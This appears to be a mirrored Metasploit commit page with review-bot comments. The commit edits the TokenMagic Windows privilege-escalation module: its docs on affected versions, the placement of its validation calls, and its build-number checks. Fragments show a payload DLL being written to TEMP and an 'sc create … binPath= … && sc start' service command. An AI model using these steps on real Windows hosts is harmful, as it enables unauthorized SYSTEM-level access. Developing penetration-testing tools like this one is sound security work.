mirror of https://github.com/rapid7/metasploit-framework synced 2024-09-25 10:48:31 +02:00

Land #15223, move TokenMagic validation logic

This commit is contained in:
Shelby Pace 2021-05-24 14:51:13 -05:00
commit 8e4a33f2a2
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
2 changed files with 10 additions and 9 deletions


@ -11,9 +11,11 @@ The module exploits the high IL gained from the "token magic" by either starting
on a known DLL in `system32`.
### Installation And Setup
Windows 10 versions 1803 is vulnerable out of the box. Token Magic works on Windows 7, 8, 8,1 and Windows 10 instances up to 1803. The DLL
Windows 10 versions 1803 is vulnerable out of the box. Token Magic works on Windows 7sp1, 8, 8,1 and Windows 10 instances up to 1803. The DLL
hijacking method in this module relies on a DLL that is only usable in Windows 1703 - 1803 and will not work on other
versions. Also note the DLL method uses a trigger that can take up to ten minutes to return a shell.
versions. Also note the DLL method uses a trigger that can take up to ten minutes to return a shell. The technique
may work on Windows 7 sp0, but loading powershell appears to crash the session. You might be able to upload and run
the powershell script manually after some edits to accomplish access to a Windows 7 sp0 target.
## Verification Steps
1. Start msfconsole
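Review bot: the rewritten sentence in this hunk carries over two typos from the old line and adds a spacing one: "Windows 10 versions 1803" should read "Windows 10 version 1803", "8,1" should be "8.1", and "7sp1" should be "7 SP1" (the new sentence about "Windows 7 sp0" uses the spaced form, so the two are inconsistent). Suggested wording for the first line: `Windows 10 version 1803 is vulnerable out of the box. Token Magic works on Windows 7 SP1, 8, 8.1 and Windows 10 instances up to 1803.` Capitalising "PowerShell" in the two added sentences would also match the rest of the framework's docs.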


@ -139,6 +139,10 @@ minutes to trigger', 'SERVICE', ['SERVICE', 'DLL']
writable_dir = session.sys.config.getenv('TEMP')
end
# Check target
validate_active_host
validate_payload
if datastore['METHOD'] =~ /DLL/i
bin_path = "#{writable_dir}\\WindowsCoreDeviceInfo.dll"
payload = generate_payload_dll
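Review bot: running `validate_active_host` and `validate_payload` before the `METHOD` branch is the right ordering, since it fails the run before a payload DLL or EXE is generated; please confirm both helpers abort the module (e.g. via `fail_with`) rather than only printing, because nothing here inspects a return value and execution falls straight into the `if datastore['METHOD'] =~ /DLL/i` branch regardless. The `# Check target` comment is now the only marker of this step; see the next hunk about the status message that used to accompany it.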
@ -156,11 +160,6 @@ minutes to trigger', 'SERVICE', ['SERVICE', 'DLL']
cmd_args = "/c sc create #{service_name} binPath= #{bin_path} type= own start= demand && sc start #{service_name}"
end
# Check target
print_status('Checking Target')
validate_active_host
validate_payload
# Upload the payload
print_status("Uploading payload to #{bin_path}")
write_file(bin_path, payload)
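Review bot: this hunk removes `print_status('Checking Target')` together with the validation calls, but the relocated block earlier in the file only re-adds the two `validate_*` calls, so the user no longer sees that the target check happened before "Uploading payload to ...". Suggest carrying the status line along with the move, i.e. placing `print_status('Checking Target')` immediately above `validate_active_host` in its new position, so console output is unchanged for existing users and the module's own docs and any log-based tests that expect that message still hold.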
@ -217,11 +216,11 @@ minutes to trigger and recieve a shell.")
vprint_status("Build Number = #{build_num}")
if datastore['METHOD'] =~ /service/i
# Service method has been tested on Windows 7, 8 and 10 (1803 and ealier)
return Exploit::CheckCode::Appears if (build_num >= 7600 && build_num <= 17134)
return Exploit::CheckCode::Appears if (build_num >= 7601 && build_num <= 17134)
elsif (sysinfo_value =~ /10/ && build_num >= 15063 && build_num <= 17134)
# DLL method has been tested on Windows 10 (1703 to 1803)
return Exploit::CheckCode::Appears
elsif (datastore['METHOD'] =~ /dll/i && build_num >= 7600 && build_num < 15063)
elsif (datastore['METHOD'] =~ /dll/i && build_num >= 7601 && build_num < 15063)
print_error("The current target is not vulnerable to the DLL hijacking technique. Please try setting METHOD to 'SERVICE' and then try again!")
end
Exploit::CheckCode::Safe
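Review bot: raising the lower build bound from 7600 to 7601 in both branches matches the documentation change to "7sp1" (7601 is the Windows 7 SP1 build), but the comment directly above, `# Service method has been tested on Windows 7, 8 and 10 (1803 and ealier)`, still says plain "Windows 7" and keeps the "ealier" typo; update it to "Windows 7 SP1, 8 and 10 (1803 and earlier)" so the check code and its comment agree. The hunk header's context line also shows "recieve a shell" in the module's user-facing string, which could be fixed in the same pass. The new bounds also mean a Windows 7 RTM target (build 7600) now falls through every branch and returns `Safe` with no message; a short `vprint_status` noting that SP1 is required would make that outcome less confusing.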